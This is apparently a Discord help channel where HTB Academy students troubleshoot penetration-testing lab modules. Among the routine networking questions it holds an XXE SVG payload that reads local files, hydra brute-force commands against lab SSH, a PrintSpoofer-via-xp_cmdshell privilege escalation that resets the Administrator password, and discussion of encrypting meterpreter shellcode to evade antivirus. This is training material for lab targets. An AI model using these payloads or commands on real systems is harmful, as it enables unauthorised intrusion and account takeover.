the VPNs are labeled us-academy-[1,2,3] or eu-academy-[1,2]

cunning night
#

got it

long orchid
#

how do i list services listening on interfaces, i used service --status-all, and systemctl list-unit-files --type=service

fathom pendant
#

usually netstat is a good command to start with

#

man netstat will provide you the flags you can look for to get your info

inner geyser
#

4 VPNs per region now? spudoodios

#

oh wait, EU has 5

long orchid
fathom pendant
#

i would take off the wc -l part

#

as the answer specifically states to exclude certain interfaces i.e. ipv6

long orchid
#

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only), this is the question, as far as i understood, is asking for all, not just those, am i confused?

fathom pendant
#

just take off the wc -l portion and you'll see

#

you're still seeing all listening interfaces

#

just need to drop off certain ones

#

it's also asking specifically in this instance ipv4 only

#

it seems weird

#

but it's saying not localhost (127.0.0.0/::1) and ipv4 only so generally 0.0.0.0

cloud urchin
#

well, are you connected to the target system? the commands MarcieLee gave you are for your local system, so they will only work if you're remotely connected already, otherwise you may need to run something like nmap to find what services are running on various ports.

long orchid
#

i am connected on target via ovpn

fathom pendant
#

that's not how ovpn works

#

ovpn just connects you to the vpn network

cloud urchin
#

open vpn connects you to the same network, so you can access the victim host you spawn. you'll need to connect to the victim box with ssh or rdp, or something like that.

long orchid
#

oh, also ssh

fathom pendant
#

not also

#

just via ssh

#

as I said

long orchid
fathom pendant
#

drop the wc -l part

#

so you can see what it's actually grabbing

long orchid
#

ok, let me try that

fathom pendant
#

and adjust your grep or strategy

#

note: -v is inverse grep, and matches the opposite of what you specify

#

so if you have a list

1
2
3
4

and do grep -v 3, it'll select lines 1, 2, and 4

long orchid
#

i have been on this almost all afternoon, i will come back fresh tomorrow, have a great night, and tyvm for ur assist.

cloud urchin
#

yup next time mention the module and section so people can better assist

long orchid
#

oh, sorry, yup LINUX FUNDAMENTALS
Filter Contents

#

see you tomorrow

sick frost
#

can anyone give me a nudge on the file upload skill assessment. I'm not able to find where the contact/upload.php file is to read it's contents. I'm using an XXE payload. I'm able to read /etc/passwd file fine. The payload was not wrong.

||<?xml version="1.0" standalone="no"?>

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [

<!ENTITY xxe SYSTEM "file:///var/www/html/index.php">

]>

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">

<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

<text font-size="16" x="0" y="16">&xxe;</text>

<script type="text/javascript">

    alert(document.domain);

</script>

</svg>'

||

cloud urchin
#

I think the only time XXE is mentioned is in the Limited File Uploads section, give that a review.

glass quail
#

hey superNuts you still there

cloud urchin
#

yeah

glass quail
#

im still on the module do I need to try a wordlist to see if another parameter works

#

or work with the ones they give me

cloud urchin
#

what module

glass quail
#

file inclusion

cloud urchin
#

send me a dm

fringe urchin
#

I dont have my notes with me, but i guess thats footprinting lab? Hard?
Rdp is open but yea wrong creds from what i remember

stark lark
fringe urchin
#

And not alex

muted kindle
#

if your user isn't an administrator they need to be in the "Remote Desktop Users" group to rdp

stark lark
fringe urchin
#

Ah sorry, yea no i was thinking of hard lab still ffs.

#

You typed wrong password

#

Into rdp. You can use single quotes

stark lark
muted kindle
#

if you get this kind of error it's issue on OS level probablyu access denied

next bronze
#

nah that's a network problem

muted kindle
#

i can rdp fine with the admin though

stark lark
fringe urchin
fringe urchin
muted kindle
stark lark
#

Why is my screenshots being deleted kek

fringe urchin
#

Well i know it says Sa but it maybe just means its a password for an account

fringe urchin
stark lark
fringe urchin
#

Can you rdp with alex?

stark lark
#

Let me try again

fringe urchin
#

If not then network problem

fringe urchin
#

Since he maybe dont like special chars

stark lark
#

Yup single quotes did it

uneven oracle
#

Soooo…
I’m in Getting Started/Attacking Your First Box/Nibbles Web Footprinting-Initial Foothold

It’s not allowing me to navigate to the nibbleblog directory.
There’s no way to complete the module.

fringe urchin
#

Add the full link

eager ledge
#

All the pwnbox region show high latency. Internet is working fine. Am I the only one facing the issue?

uneven oracle
eager ledge
stable bone
muted kindle
# uneven oracle I did.

by not being able to reach it do you mean the site gets stuck loading forever or is there some error?

fringe urchin
eager ledge
muted kindle
stable bone
uneven oracle
muted kindle
#

i'm doing the sigma rules module which have a lot of rdp too :))))

fringe urchin
#

Ah im blind

uneven oracle
fringe urchin
#

You already did, it was at the end

muted kindle
uneven oracle
muted kindle
uneven oracle
muted kindle
uneven oracle
muted kindle
uneven oracle
muted kindle
bold sinew
#

Greetings gents.

Module: Password Attacks > Password Attacks Lab - Easy

Confused as to how I should proceed with this lab. Attempting to brute force the SSH service with crackmapexec and the lab is either timing out after taking so long or im getting no hits when I try to use brute force this. I've tried bruteforcing root account using mutated password list and password list from the module as well as rockyou.txt and im getting no hits. Using the provided username list causes the target to time out and despawn before I can complete it.

What am I doing wrong here?

cloud urchin
#

ssh is super slow to brute, try another service

normal sand
cloud urchin
#

20 min or less

#

depends on your computer and the section

bold sinew
fallen tusk
#

Did you work it out in the end?

normal sand
# cloud urchin 20 min or less

I've been using pwnbox.
I used this command to generate the mutated list:
||```
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

And then I ran this command to crack the password:
||```
hydra -l sam -P mut_password.list ssh://10.129.202.64
```||
It's been 40+ minutes...
bold sinew
cloud urchin
bold sinew
#

^ That was my plan if root/rockyou.txt wasnt gonna work

#

but uh ftp isnt happy with me

cloud urchin
#

reboot the box

#

dont use rockyou use the resources

bold sinew
#

👍

cloud urchin
#

also don't brute ssh

normal sand
normal sand
cloud urchin
#

both

#

it didn't say brute force ssh

#

it said log in with ssh once you have the password

normal sand
cloud urchin
#

use ftp with 48 threads

fierce fable
#

Can anyone have free fire hack?

normal sand
cloud urchin
fierce fable
normal sand
cloud urchin
#

-t (tasks) specifies the number of parallel tasks, like the concurrent sessions it will establish

#

how many it runs at the same time

normal sand
#

Is there a way to know how many parallel tasks your machine can handle?

cloud urchin
#

its more how many the ftp server can handle not your machine

#

for htb modules 48 is the sweet spot

#

64 will dos the server

uneven oracle
normal sand
uneven oracle
muted kindle
uneven oracle
muted kindle
uneven oracle
#

My browser:

#

My terminal:

muted kindle
uneven oracle
uneven oracle
woven stone
#

Windows File Transfer Methods

#

What's wrong here I don't know

fathom pendant
# woven stone

because that address isn't real; it doesn't exist; you don't have access to it

#

scroll all the way down

#

there's a "spawn target" button

#

oh wait

next bronze
#

is he trying to connect his own host to the vm

fathom pendant
#

yes

next bronze
fathom pendant
#

and also that's not how copy works

fathom pendant
#

that powershell console is on host

next bronze
#

oh brother

fathom pendant
#

if you look above that they were trying to 1::1 the section

next bronze
#

well good thing the connection failed if not he would've leaked his own ntlmv2 hash

fathom pendant
#

you also don't know how shares work

#

copy \\ip\share\file . will copy the file to your current directory

next bronze
fathom pendant
#

^

next bronze
#

even if you got the path right, nc.exe will 100% get marked by defender

woven stone
#

I wanted to see if AV would stop me

fathom pendant
#

Xre0uS point is, it's generally not smart to test on your host

#

you can enable defender on the target since you have admin privs

next bronze
fathom pendant
#

and functionally do the same thing

fluid quartz
#

Can someone please share their code for the AES crypter at the start of windows evasion?

woven stone
fathom pendant
#

doesn't look like another VM to me

#

as it looks like the PowerShell console is running on your host

#

as it's above the chrome and other vm window

#

unless you're telling me you went turtles all the way down, which I doubt given the current conversation

woven stone
fathom pendant
fluid quartz
#

I have tried lots of different ways I think it’s in what I’m doing with cyber chef and one of those “you don’t know until you know” things

#

Ticking the right box on the right form, and not a matter of not learning or reading. So it’s easier if I can just know where I went wrong in the procedure

#

The code is given by the module, too, i think it’s how much of the shellcode generated is included in the encrypted data, whether the variable declaration is in it (and which parts?) or its pure shellcode

next bronze
#

where did you get the original meterpreter shellcode from? did you test that it works

#

also it's better to describe what issue you're facing instead of just asking for code

fathom pendant
woven stone
fathom pendant
#

you missed an important thing

woven stone
fathom pendant
#

the sharename

#

you just did \\ip\file

#

it's \\ip\share\file

#

it "not work" because you didn't do it right

fathom pendant
#

weird it's reading the . as part of the filename

#

try ./ and see if that changes it

#

or ./file.xt

#

learn to read errors

woven stone
fathom pendant
#

worst case you'd have to specify the full filepath

#

and look above as it's highlighting the whole line

#

including the .

woven stone
fathom pendant
#

you can also do copy /? to see it's syntax

woven stone
#

The device connects but there is no file

fathom pendant
#

try specifying the full path

#

like C:/Windows/Temp

#

you can also try net use x: \\ip\share\ and navigate to X:

rustic sage
#

why is your syntax 'sudo impacket-smbserver share . -smb2support' when the example says ''sudo impacket-smbserver share -smb2support'

rustic sage
#

Look at the impacket smb server setup pic

fathom pendant
#

sudo impacket-smbserver [sharename] [file location] -smb2support

rustic sage
#

marcie

autumn pilot
#

VPN IP

rustic sage
#

look at the smbserver screenshot

woven stone
rustic sage
#

there is a . between share and -smb2

fathom pendant
#

it's sudo impacket-smbserver [sharename] -smb2support [filelocation]

#

it looks like it created it weirdly

#

¯_(ツ)_/¯

rustic sage
#

I'm pretty confident in what I can see

fathom pendant
#

so am i

fathom pendant
#

you goon

woven stone
fathom pendant
#

brother

#

i'll give you one attempt to critically think about the command i shared

#

and tell me if you think it should be on the att or vic machine

fathom pendant
#

¯_(ツ)_/¯

woven stone
#

like HTB

fathom pendant
#

could just be that windows doesn't like it

fluid quartz
fathom pendant
#

could be your msfvenom command was wrong

fluid quartz
#

For real, you’re going to hit me with that “have you tried turning it on and off again?”

#

lol

fathom pendant
#

¯_(ツ)_/¯

#

just offering up a potential issue

fluid quartz
#

Can I ask have you done this bit?

#

Coz my question could be direct. Do I include the variable declaration in the encryption I feed to cyberchef or just the shellcode?

fathom pendant
#

no idea brother, yes i haven't done this bit. and @next bronze point was did you try it

#

as in are you sure it works before trying to dig into it

fluid quartz
#

Ok I’ll look into it

fathom pendant
#

if it doesn't work, then the point is moot

#

i mean you can try with and without throwing the variable dec into cyberchef

fathom pendant
#

but afaik cyberchef just does decoding

next bronze
fathom pendant
#

no need to be crazy with it

next bronze
#

cyberchef only encrypts/decypts, it doesn't write the var for you

fluid quartz
green basalt
#

how i can send photo on chat i got stuck in footprinting module

next bronze
#

it will be the same as the module, it has worked for them

fluid quartz
#

Hmmm ok. No worries. Thanks for your time!

fathom pendant
next bronze
#

I write my own encryptor/decryptor in C using bcrypt

fluid quartz
#

So you didn’t follow the module?

#

You got it on GitHub or anything?

next bronze
#

my guy, just try to make it yourself, maldev is frustrating, I get it, but figuring it out yourself based on what's in the module is more fun

fluid quartz
#

Haha just about the time saving. It’s a new concept for me. I’m fine with hearing the answer and making my way from there

green basalt
#

i am sure i did it but there some stubbed problem

fluid quartz
#

It’s the age of ChatGPT. If you think hearing the answer is cheating. Your in the Bronze Age

fathom pendant
fluid quartz
#

Post humanity bro, save your tears. The singularity is coming

fathom pendant
#

if you just want the answers then pay for an annual sub

green basalt
# fathom pendant ?

Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))

fluid quartz
#

There is zero difference between reading a book and being told what the book meant

fathom pendant
#

dig txt subdomain.inlanefreight.htb @target_ip

#

there's a generous leap of logic betweene those two

green basalt
fathom pendant
#

as one requires critical thinking

fathom pendant
fluid quartz
#

Let’s assume critical thinking is a certainty. There’s no difference

fathom pendant
#

you should be able to arrive at conclusions on your own, without being told

green basalt
fathom pendant
#

well if you used the right internal subdomain, then it should work

#

step 1; dig axfr inlanefreight.htb @target_ip

#

step 2; just try different subdomains until it works

green basalt
#

but when i subimt it dose not

fathom pendant
fathom pendant
#

the answer would be the HTB{..}

green basalt
green basalt
fluid quartz
#

Ha ha! If I bought Exam answers I wouldn’t be here asking for your time

fathom pendant
#

as I said though most modules have a writeup that's accessible via having an annual sub

fluid quartz
#

Will do.

#

Thanks anyway I appreciate the dialogue

fathom pendant
#

and as @next bronze said, it looks like the provided cyberchef recipe should work

#

provided that your shellcode is correct at least

fluid quartz
burnt owl
#

even if I completed the module

fathom pendant
#

the writeup feature is a perk of the sub, not a condition of completing the module

burnt owl
#

Ow damn good to know

fathom pendant
#

no sub = no feature

storm elk
#

Module: Injection Attacks
Section: XPath Injection Prevention & Tools

The module explains the use of xcat the flag from the previous exercise is shown with question marks (?) instead of the curly brackets ( { and } ) - is there a way to properly get these characters?

spark spruce
storm elk
#

Yes, during manual it went fine. Was just wondering if there was any fix for the automated tool 🙂 thanks for your response!

haughty tree
#

Do they mean here that payloads enocded with SGN are not universally detectable or that they are univeraslly detecable im a bit confused

next bronze
#

sgn is easily detected nowadays

#

the phrasing is a bit weird

haughty tree
#

Got it, thanks!

ebon minnow
#

Is there a linux equivalent of the "Windows Event Logs & Finding Evil" module in the HTB Academy?

fathom pendant
#

not afaik

#

as a lot of attacks go after Windows devices, and domain joined instances, there's not a big focus on linux def

bold sinew
#

Heya, how would I import an id_rsa file I just cracked so I can authenticate to a service that only allows authentica via a key?

#

Working on the Password Attacks > Password Attacks Lab - Easy for reference

fathom pendant
#

download the file

#

chmod to x00 where x is any octal perms for owner

#

the important bit is removing perms from other users

#

ssh -i id_rsa <username>@<server/ip>

bold sinew
#

How would I check what perms are on the id_rsa file so I know what to remove? and what is the command for removing a perm from another user?

fathom pendant
#

chmod ### file where each # is an octal permission that is either one or a combination (addition) based off of
4 - read
2 - write
1 - execute

#

0 = no perms

bold sinew
#

ah right, I misunderstood what you were saying 🙂

fathom pendant
#

alternatively

#

there's the letter codes

#

i don't recall those

#

as i more frequently use octal, as it's just faster

#

ls -la can show file perms

fathom pendant
#

0--------- (the leading 0 just means it's a file, a leading d is directory)

#

each octal represents a different group type
owner
group
other
--- | --- | ---
rwx | --- | --- = 700

#

rwx | rwx | rwx = 777

#

(sticky bits get a tiny bit complicated, but you don't generally have to worry about that

bold sinew
#

All I know about chmod perms is that 777 means full access and 700 means read only, never actually understood how it works

#

but ty, this is insightful

fathom pendant
#

as users have two ids; UID and GID/ userID and GroupID
UserID is who you are
GroupID is what group you belong to, such as root/admin/backup_operators

bold sinew
#

I see!

#

so i'd probably wanna do chown on the id_rsa file then too I presume?

fathom pendant
#

nope

#

when you download a file, the owner is default the user who downloaded it

bold sinew
#

Thats good to know

fathom pendant
#

the only thing ssh cares about is that the user using the file is the owner and is the only one that CAN modify/read it

#

(yes it uses 4 octals, but those relate to sticky bits - and those are beyond scope)

bold sinew
#

Makes sense, wouldnt want your key to be usuable by anyone

#

So I suppose appropriate perms would be something like 400?

#

I'll try that and see how I go

fathom pendant
#

x00 works where x is any number between 4-7 afaik should work idk if it works for any number 1-7

#

as long as the other sets are 0, it's happy

fading spoke
#

any advice pls on nmap module q: Find all TCP ports on your target. Submit the total number of found TCP ports as the answer.

-p-
-sT -p-
--top-ports=100
going down to 26 plus the 53 port is 27, answer is wrong?

fading spoke
#

thank you

fathom pendant
#

you have the right idea with -p-

#

and -sT

#

seems like your target spawned weird

fading spoke
#

gotcha

#

revertin

fathom pendant
#

also how are you getting the number could also be a factor in why you're getting the wrong answer

#

i.e. if you're just tossing it to wc -l; you're gonna get the wrong answer

fading spoke
#

still nothing w nmap -Pn -sT -p- <ip>

#

only nmap -Pn -sV --top-ports=26 gives back results

fathom pendant
#

don't adjust ports

fading spoke
#

--top-ports=27 nothin

#

100 and 10 the same

#

w 10 it gives back 10 ports

fathom pendant
#

try adding -T4 if the scan is taking a long time

#

that's weird because it shouldn't

fading spoke
#

right

#

thats my thought

fathom pendant
#

are they listed as open/closed/filtered?

fading spoke
#

yes

#

no

#

all filtered and 1 open

fathom pendant
#

yeah so for w/e reason it's also showing filtered

#

i believe adding --open will only show open ports

fading spoke
#

question is tcp ports, not 'open' ports

fathom pendant
#

found implies open

fading spoke
#

understood

fathom pendant
#

because you can generally only find open ports

fading spoke
#

well

fathom pendant
#

just spun it up myself and scanned

kind trail
#

Anyone have a second to help debug? Windows AD skills assessment part II, MSSQL xp_cmdshell privesc, windows server 2019 service user w/ SeImpersonate -> SYSTEM using PrintSpoofer. This command just hangs and never completes xp_cmdshell C:\Windows\Temp\PrintSpoofer64.exe -c "net user Administrator Welcome1"

fathom pendant
#

did sudo nmap -p- -sT <ip> and it gave me the expected result

fading spoke
#

ports can be closed but still findable by RA flag w --packet-trace?

fathom pendant
#

so wrap it all in single quotes

fathom pendant
#

point is something is up with your target

#

restart it

fading spoke
#

yes

#

did so many times already

fathom pendant
#

then change vpn regions

#

it also helps if you share your full command, not redacted

fading spoke
#

sudo nmap -sT -p- <ip> gives host seems down

fathom pendant
#

and a screenshot of your output

fathom pendant
#

the <ip> you're supplying is the one generated when you spawn target yeah?